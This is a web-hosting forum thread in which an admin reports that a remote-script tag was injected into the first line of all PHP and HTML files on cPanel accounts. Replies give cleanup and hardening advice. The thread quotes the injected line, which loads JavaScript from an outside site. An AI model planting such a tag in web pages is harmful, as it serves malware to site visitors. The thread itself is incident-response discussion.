security problem, php and html files vulnerability
from 2 days I have a problem with some accounts on my some vps with cpanel.
I must find and replace specific string in all accounts, I find in all files php and html on some ftp root this:
<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>
in first line for every file and I must run a conbination od find and sed command for remove it
Re: security problem, php and html files vulnerability
for security I change some account passoword but I checked ftp log and not see activity from this
Re: security problem, php and html files vulnerability
It sounds like your server may have been rooted/compromised. Try and contact Steve at
/http://www.rack911.com/
Re: security problem, php and html files vulnerability
I use Centos 6 and suPHP module
Re: security problem, php and html files vulnerability
that makes no difference whatsoever. If all of your sites are serving malware the server has most likely been compromised in some way, possibly rooted. You need an expert to look at it and help you get it up and running normally again...and secure it against future problems.
Re: security problem, php and html files vulnerability
If all the domains on the same server were not effected then the server isnt owned, the domains have been compromised. Which usually means the passwords for those passwords were stolen from infected desktops. Check your logs, particularly youre ftp logs, to see if these files are just being uploaded. If they are, its stolen credentials and fairly easy to fix, just change the users passwords and restore the domain files from good backups.
If every domain on the same server is effected the server might be owned. If you arent sure, reinstall the entire box from scratch and lock it down, or hire someone to lock it down. Trying to clean up an owned server is next to impossible, especially if a kernel rootkit got installed.
Re: security problem, php and html files vulnerability
You should also install mod_security w/ atomic rules. Also always update your scripts to the latest versions.
www.PlotHost.com - Professional Web Hosting Solutions
Re: security problem, php and html files vulnerability
Hello
verify is enable_dl is on in php.ini. If on, then turn to off
Thank you
Konrath
Re: security problem, php and html files vulnerability
SuPHP is substantially better than DSO (mod_php) but doesn't in itself prevent any cross-site injection or scripting.I use Centos 6 and suPHP module
The problem you have described originates from an exploit from a vulnerable web script usually either an old version of OsCommerce or an old version of Wordpress about 70% of the time.
Most of the other 30% typically originates from the user being compromised with a trojan at home that allows the hackers to just simply steal their passwords from their own computers.
Once a single site has successfully been compromised, it is generally trivial to compromise the rest of the hosting accounts from within the server unless really hardcore security measures have been actively put into place --- for most hosting administrators on average, they probably haven't done that.
The discussion of what all you need to do to properly lock down your server correctly is much too lengthy to really be able to write in a single forum post and would be an extended discussion in and of itself.
What I would recommend doing in the immediate right now before looking into any of that, is first get all your client's web scripts and applications fully up to the minute up to date with the newest versions and don't allow anyone to run anything that is in any way significantly old ---- allowing clients to run old scripts is just asking for trouble in itself.
LinkBack URL
About LinkBacks
Reply With Quote